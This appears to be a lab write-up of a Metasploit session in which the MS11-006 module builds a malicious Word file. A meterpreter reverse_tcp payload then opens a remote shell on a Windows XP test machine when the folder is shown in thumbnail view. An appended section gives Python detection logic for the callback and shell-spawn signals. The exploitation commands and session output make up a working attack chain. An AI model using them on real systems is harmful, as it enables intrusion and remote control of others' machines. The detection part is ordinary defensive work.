Metasploit file-format vulnerability exploitation (shell obtained successfully)

Environment: BT5R1

msf > use windows/fileformat/ms11_006_createsizeddibsection
msf  exploit(ms11_006_createsizeddibsection) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf  exploit(ms11_006_createsizeddibsection) > set LHOST 192.168.1.11
LHOST => 192.168.1.11
msf  exploit(ms11_006_createsizeddibsection) > set LPORT 443
LPORT => 443
msf  exploit(ms11_006_createsizeddibsection) > set OUTPUTPATH /opt/framework/msf3/data/exploits/
OUTPUTPATH => /opt/framework/msf3/data/exploits/
msf  exploit(ms11_006_createsizeddibsection) > show options

Module options (exploit/windows/fileformat/ms11_006_createsizeddibsection):

   Name        Current Setting                     Required  Description
   ----        ---------------                     --------  -----------
   FILENAME    msf.doc                             yes       The file name.
   OUTPUTPATH  /opt/framework/msf3/data/exploits/  yes       The output path to use.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  seh              yes       Exit technique: seh, thread, process, none
   LHOST     192.168.1.11     yes       The listen address
   LPORT     443              yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf  exploit(ms11_006_createsizeddibsection) > exploit

[*] Creating 'msf.doc' file ...
[*] Generated output file /opt/framework/msf3/data/exploits/msf.doc
msf  exploit(ms11_006_createsizeddibsection) > use multi/handler
msf  exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf  exploit(handler) > set LHOST 192.168.1.11
LHOST => 192.168.1.11
msf  exploit(handler) > set LPORT 443
LPORT => 443
msf  exploit(handler) > exploit -j
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.11:443 
[*] Starting the payload handler...
msf  exploit(handler) > sessions -l

Active sessions
===============

No active sessions.

msf  exploit(handler) > 

I copied msf.doc onto the XP machine. At first I double-clicked it, and nothing happened on the BT5 side.

Later I switched the folder to thumbnail view; without even double-clicking msf.doc, BT5 got a response (the book says the document has to be opened, which is probably wrong).

msf  exploit(handler) > 
[*] Sending stage (752128 bytes) to 192.168.1.143
[*] Meterpreter session 1 opened (192.168.1.11:443 -> 192.168.1.143:1099) at 2013-05-14 19:32:47 -0400

msf  exploit(handler) > sessions -l

Active sessions
===============

  Id  Type                   Information                                      Connection
  --  ----                   -----------                                      ----------
  1   meterpreter x86/win32  ROOT-4556186478\Administrator @ ROOT-4556186478  192.168.1.11:443 -> 192.168.1.143:1099

msf  exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > ls

Listing: C:\Documents and Settings\Administrator
================================================

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
40777/rwxrwxrwx   0       dir   2013-05-14 10:20:44 -0400  .
40777/rwxrwxrwx   0       dir   2013-05-14 10:20:43 -0400  ..
40555/r-xr-xr-x   0       dir   2013-05-14 10:21:13 -0400  Application Data
40777/rwxrwxrwx   0       dir   2013-05-14 10:14:40 -0400  Cookies
40777/rwxrwxrwx   0       dir   2013-05-14 17:51:30 -0400  Desktop
40555/r-xr-xr-x   0       dir   2013-05-14 10:21:21 -0400  Favorites
40777/rwxrwxrwx   0       dir   2013-05-14 17:51:30 -0400  Local Settings
40555/r-xr-xr-x   0       dir   2013-05-14 10:21:22 -0400  My Documents
100666/rw-rw-rw-  786432  fil   2013-05-14 11:30:17 -0400  NTUSER.DAT
40777/rwxrwxrwx   0       dir   2013-05-14 17:51:30 -0400  NetHood
40777/rwxrwxrwx   0       dir   2013-05-14 17:51:30 -0400  PrintHood
40555/r-xr-xr-x   0       dir   2013-05-14 11:30:35 -0400  Recent
40555/r-xr-xr-x   0       dir   2013-05-14 10:21:02 -0400  SendTo
40555/r-xr-xr-x   0       dir   2013-05-14 17:51:30 -0400  Start Menu
40777/rwxrwxrwx   0       dir   2013-05-14 10:10:10 -0400  Templates
100666/rw-rw-rw-  1024    fil   2013-05-14 11:32:49 -0400  ntuser.dat.LOG
100666/rw-rw-rw-  178     fil   2013-05-14 10:23:33 -0400  ntuser.ini

meterpreter > sysinfo
Computer        : ROOT-4556186478
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > shell
Process 1888 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Administrator>

If you switch to a Simplified Chinese edition of XP and view the folder in thumbnail view, it fails and no shell is obtained.
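From the defender's side, the session above shows two host-level signals worth alerting on: the target's shell/preview process opening its own outbound TCP connection to the handler on 192.168.1.11:443 (443 is picked so the callback looks like HTTPS, so the process context, not the port, is what stands out), and a document handler spawning a command interpreter, which is what the meterpreter `shell` command does ("Process 1888 created"). The following Python is an added example, not part of this write-up or of Metasploit; it runs over constructed Sysmon/EDR-style records whose field names are invented here, and it assumes (based on the thumbnail observation above) that a thumbnail-triggered payload executes inside explorer.exe.

```python
"""Host-side detection of the callback pattern seen in the write-up.

Added example, not part of the original post or of Metasploit. Models two
telemetry signals as constructed Sysmon/EDR-style records (field names
are invented for this example):

  * a document/preview process initiating its own outbound TCP connection
    (the reverse_tcp callback to 192.168.1.11:443 in the write-up), and
  * a document handler spawning a command interpreter.
"""
from dataclasses import dataclass
from typing import List, Optional


@dataclass(frozen=True)
class Event:
    kind: str     # "netconn" (outbound connect) or "proccreate" (child spawned)
    image: str    # image name of the acting process, e.g. "explorer.exe"
    detail: str   # netconn: "dst_ip:dst_port"; proccreate: child image name


# Processes that render documents or previews. explorer.exe is included
# because a thumbnail-triggered file-format exploit runs inside the shell
# process (assumption drawn from the write-up's thumbnail observation).
DOCUMENT_HANDLERS = {"explorer.exe", "winword.exe", "acrord32.exe", "wordpad.exe"}

# explorer.exe legitimately reaches file servers; ignore those ports for it.
EXPLORER_BENIGN_PORTS = {139, 445}

SHELLS = {"cmd.exe", "powershell.exe"}


def evaluate(ev: Event) -> Optional[str]:
    """Return an alert string for a suspicious event, else None."""
    img = ev.image.lower()
    if ev.kind == "netconn" and img in DOCUMENT_HANDLERS:
        dst_ip, dst_port = ev.detail.rsplit(":", 1)
        if img == "explorer.exe" and int(dst_port) in EXPLORER_BENIGN_PORTS:
            return None
        return f"outbound connection from document handler {img} -> {dst_ip}:{dst_port}"
    if ev.kind == "proccreate" and img in DOCUMENT_HANDLERS and img != "explorer.exe":
        # explorer.exe -> cmd.exe is how users open a prompt, so it is skipped;
        # winword.exe -> cmd.exe is not normal editing behaviour.
        if ev.detail.lower() in SHELLS:
            return f"document handler {img} spawned {ev.detail.lower()}"
    return None


def scan(events: List[Event]) -> List[str]:
    """Run every event through evaluate() and keep only the alerts."""
    return [a for a in (evaluate(e) for e in events) if a is not None]


# Constructed sample telemetry modelled on the addresses in the write-up.
SAMPLE_EVENTS = [
    Event("netconn", "explorer.exe", "192.168.1.11:443"),   # callback to the handler
    Event("netconn", "explorer.exe", "192.168.1.20:445"),   # browsing an SMB share
    Event("netconn", "iexplore.exe", "192.168.1.11:443"),   # a browser using 443
    Event("proccreate", "winword.exe", "cmd.exe"),          # Word spawning a shell
    Event("proccreate", "explorer.exe", "cmd.exe"),         # user opened a prompt
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert)
```

Run as-is it reports two alerts: the explorer.exe connection to 192.168.1.11:443 and winword.exe spawning cmd.exe; the SMB share access, the browser's HTTPS traffic and the user-launched prompt are left alone. The allowlist of benign ports for explorer.exe is deliberately narrow; a real deployment would extend it from observed baseline traffic rather than from port numbers alone, since the attacker chooses the callback port.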
